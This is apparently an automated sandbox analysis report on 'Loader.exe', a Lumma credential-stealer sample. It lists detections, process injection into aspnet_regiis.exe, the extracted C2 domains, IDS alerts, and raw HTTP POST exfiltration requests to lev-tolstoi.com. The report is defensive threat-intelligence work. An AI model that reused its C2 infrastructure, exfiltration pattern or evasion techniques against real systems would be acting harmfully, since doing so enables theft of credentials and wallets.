
Windows Analysis Report
Loader.exe

Overview

General Information

Sample name: Loader.exe
Analysis ID: 1581746
MD5: 2ec18b257662dd107ae84263ecd2e5c1
SHA1: ce2efa8394c35b8da16428b10ece4a856c53dd1f
SHA256: 539f0617a85a7a0773cf9e36d803c1a8ddf5c69dc003c80c1f3afac147b47554
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 3496 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 2EC18B257662DD107AE84263ECD2E5C1)
    • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 5772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "scentniej.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--5defa06fc6ab"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: aspnet_regiis.exe PID: 5772 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: aspnet_regiis.exe PID: 5772 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: aspnet_regiis.exe PID: 5772 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.binstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-28T22:05:05.268137+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP
2024-12-28T22:05:07.752125+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:09.767020+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:12.146215+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:14.544670+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:16.862818+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:19.402133+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:21.574600+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:23.705985+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49716 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:08.524544+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:10.540001+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:24.619897+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:08.524544+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:10.540001+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:03.048763+0100 | 2058572 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54520 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:03.188045+0100 | 2058576 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 52993 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:03.427192+0100 | 2058578 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57564 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:02.740771+0100 | 2058580 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50901 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:02.286296+0100 | 2058584 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54097 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:02.454948+0100 | 2058586 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 51953 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:02.599824+0100 | 2058588 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 65086 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:02.884238+0100 | 2058590 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 65025 | 1.1.1.1 | 53 | UDP
2024-12-28T22:05:20.182376+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49710 | 172.67.157.254 | 443 | TCP
2024-12-28T22:05:06.050526+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 23.55.153.106 | 443 | TCP

AV Detection

Source: https://lev-tolstoi.com/Sg5h | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/uo | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/s~ | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/T | Avira URL Cloud: Label: malware
Source: Loader.exe | Malware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "inherineau.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "scentniej.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "prisonyfork.buzz", "appliacnesot.buzz"], "Build id": "HpOoIh--5defa06fc6ab"}
Source: C:\Users\user\AppData\Roaming\gdi32.dll | ReversingLabs: Detection: 63%
Source: Loader.exe | Virustotal: Detection: 48%
Source: Loader.exe | ReversingLabs: Detection: 70%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\gdi32.dll | Joe Sandbox ML: detected
Source: Loader.exe | Joe Sandbox ML: detected
Source: Loader.exe | String decryptor: hummskitnj.buzz
Source: Loader.exe | String decryptor: cashfuzysao.buzz
Source: Loader.exe | String decryptor: appliacnesot.buzz
Source: Loader.exe | String decryptor: screwamusresz.buzz
Source: Loader.exe | String decryptor: inherineau.buzz
Source: Loader.exe | String decryptor: scentniej.buzz
Source: Loader.exe | String decryptor: rebuildeso.buzz
Source: Loader.exe | String decryptor: prisonyfork.buzz
Source: Loader.exe | String decryptor: ingreem-eilish.biz
Source: Loader.exe | String decryptor: lid=%s&j=%s&ver=4.0
Source: Loader.exe | String decryptor: TeslaBrowser/5.5
Source: Loader.exe | String decryptor: - Screen Resoluton:
Source: Loader.exe | String decryptor: - Physical Installed Memory:
Source: Loader.exe | String decryptor: Workgroup: -
Source: Loader.exe | String decryptor: HpOoIh--5defa06fc6ab
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_72C457C0 CryptUnprotectData, 3_2_72C457C0
Source: Loader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: Loader.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Loader.exe | Code function: 0_2_6CE53460 FindFirstFileExW, 0_2_6CE53460

                Networking

Source: Network traffic | Suricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.5:65086 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.5:54097 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.5:57564 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.5:52993 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.5:50901 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.5:51953 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.5:54520 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.5:65025 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49716 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: ingreem-eilish.biz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=M7Y72E3D69IRA | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12812 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=J3FFDY4G | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15024 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3A6GNRTMT0ED2APJYU3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20580 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=0GFWAZ436VZL5S3QE3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1278 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=LNSWTUQTFNJU1FQS | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1121 | Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: lev-tolstoi.com
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.b;hh equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://playl=hi equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: global traffic | DNS traffic detected: DNS query: ingreem-eilish.biz
                Source: global traffic | DNS traffic detected: DNS query: prisonyfork.buzz
                Source: global traffic | DNS traffic detected: DNS query: rebuildeso.buzz
                Source: global traffic | DNS traffic detected: DNS query: scentniej.buzz
                Source: global traffic | DNS traffic detected: DNS query: inherineau.buzz
                Source: global traffic | DNS traffic detected: DNS query: screwamusresz.buzz
                Source: global traffic | DNS traffic detected: DNS query: appliacnesot.buzz
                Source: global traffic | DNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global traffic | DNS traffic detected: DNS query: hummskitnj.buzz
                Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowere
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
